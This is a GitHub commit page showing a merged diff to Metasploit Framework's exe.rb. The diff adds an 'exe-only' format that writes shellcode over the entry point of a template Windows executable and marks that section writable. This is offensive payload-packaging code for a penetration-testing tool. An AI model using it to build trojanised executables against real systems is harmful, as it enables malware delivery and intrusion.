Skip to content

Commit 79a72a1

Browse files
scriptjunkiescriptjunkie
committed
Merge branch 'exe_only_patch' of git://github.com/agix/metasploit-framework
2 parents e25a06c + e567597 commit 79a72a1

File tree

1 file changed

+41
-1
lines changed

1 file changed

+41
-1
lines changed

lib/msf/util/exe.rb

Lines changed: 41 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -364,6 +364,41 @@ def self.to_win32pe(framework, code, opts={})
364364
exe
365365
end
366366

367+
def self.to_win32pe_only(framework, code, opts={})
368+
369+
# Allow the user to specify their own EXE template
370+
set_template_default(opts, "template_x86_windows_old.exe")
371+
372+
pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
373+
374+
exe = ''
375+
File.open(opts[:template], 'rb') { |fd|
376+
exe = fd.read(fd.stat.size)
377+
}
378+
379+
sections_header = []
380+
pe._file_header.v['NumberOfSections'].times { |i| sections_header << [(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18+0x24),exe[(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18),0x28]] }
381+
382+
383+
#look for section with entry point
384+
sections_header.each do |sec|
385+
virtualAddress = sec[1][0xc,0x4].unpack('L')[0]
386+
sizeOfRawData = sec[1][0x10,0x4].unpack('L')[0]
387+
characteristics = sec[1][0x24,0x4].unpack('L')[0]
388+
if pe.hdr.opt.AddressOfEntryPoint >= virtualAddress && pe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
389+
#put this section writable
390+
characteristics|=0x80000000
391+
newcharacteristics = [characteristics].pack('L')
392+
exe[sec[0],newcharacteristics.length]=newcharacteristics
393+
end
394+
end
395+
396+
#put the shellcode at the entry point, overwriting template
397+
exe[pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint),code.length]=code
398+
399+
return exe
400+
end
401+
367402

368403
def self.to_win32pe_old(framework, code, opts={})
369404

@@ -1930,6 +1965,11 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
19301965
output = Msf::Util::EXE.to_win32pe_old(framework, code, exeopts)
19311966
end
19321967

1968+
when 'exe-only'
1969+
if(not arch or (arch.index(ARCH_X86)))
1970+
output = Msf::Util::EXE.to_win32pe_only(framework, code, exeopts)
1971+
end
1972+
19331973
when 'elf'
19341974
if (not plat or (plat.index(Msf::Module::Platform::Linux)))
19351975
if (not arch or (arch.index(ARCH_X86)))
@@ -1994,7 +2034,7 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
19942034
end
19952035

19962036
def self.to_executable_fmt_formats
1997-
['dll','exe','exe-small','elf','macho','vba','vba-exe','vbs','loop-vbs','asp','aspx','war','psh','psh-net']
2037+
['dll','exe','exe-small','exe-only','elf','macho','vba','vba-exe','vbs','loop-vbs','asp','aspx','war','psh','psh-net']
19982038
end
19992039

20002040
#

0 commit comments

Comments
 (0)